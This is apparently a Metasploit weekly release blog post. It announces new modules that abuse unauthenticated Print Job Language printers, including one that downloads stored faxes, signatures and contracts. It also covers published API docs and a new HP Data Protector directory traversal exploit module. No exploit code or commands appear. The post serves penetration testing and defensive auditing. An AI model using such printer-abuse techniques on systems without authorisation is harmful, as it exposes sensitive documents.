Abusing Printers with PJL

This week's release features a half dozen new modules that seek out printers that talk the Print Job Lanaguage (PJL) for use and abuse. Huge thanks to our newest full time Metasploit trouble maker, William Vu.

As a penetration tester, you probably already know that office printers represent tasty targets. Like most hardware with embedded systems, they rarely, if ever, get patches. They don't often have very serious security controls. They're usually in network segments that are full of end-user desktops, but sometimes they just pop up where ever someone felt the need to have a printer, so they're often uncontrolled and unaccounted for by IT adminstrators.

Finally, and most importantly, printers are often unintentional repositories of sensitive data. The printer_download_file, in particular, can snag all sorts of proof-of-insecurity artifacts, like copies of outbound faxes, signature samples, confidential contract language... all sorts of stuff. A payroll printer is (hopefully!) not going to be PJL-aware, but the community printer/fax that all the sales guys use for quotes and fielding POs? Better start scanning your office floor.

Of course, techniques for abusing the total lack of authentication around PJL have been around for a million years. I don't know any university lab that hasn't had the LCD display changed to something funny. The story here is that these PJL modules (and associated Rex protocols) means that pentesters and IT security admins alike can more thoroughly, systematically, and routinely audit their sites for printer-based risk exposure. Hopefully, the publication of these modules will raise that visibility bar to a point where folks take this kind of thing seriously and stop relegating the risk to "party trick" levels.

Metasploit API Docs Online

If you've been watching the development news around Metasploit for the last year or so, you will no doubt read that we are aggressively pursuing reasonable in-line documentation around core Metasploit functionality. As a quick update to that, you will be pleased to see that https://dev.metasploit.com/api/ is no longer a pack of outdated lies. What you see there is exactly the same as if you were on a recent clone of the Metasploit code repository and had typed "rake yard" to locally generate the docs.

Hopefully, the increased visibility gained by dumping these autogenerated docs out to the Internet will save new Metasploit exploit devs the trouble of re-implimenting common Metasploit conventions over and over again. For example, just browsing the Wordpress class definition reveals what methods that our friend Christian @_FireFart_ Mehlmauer has already written for your Wordpress exploitation needs. Super useful.

Browsing through the internal Metasploit docs will almost certainly lead to some "Ah-ha!" moments, when you notice a pre-defined method you've never seen used before. I forget tons of things about what makes Metasploit go, and I know I'm not alone. On top of that, YARD-generated docs are just so darn pleasant to read and navigate through.

New Modules

Aside from the PJL modules, we've got a new exploit for HP Data Protector Backup Client, thanks to Juan Vazquez's tireless pursuit of teasing exploit code out of ZDI disclosures.

Exploit modules

HP Data Protector Backup Client Service Directory Traversal by juan vazquez and Brian Gorenc exploits ZDI-14-003

Auxiliary and post modules

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.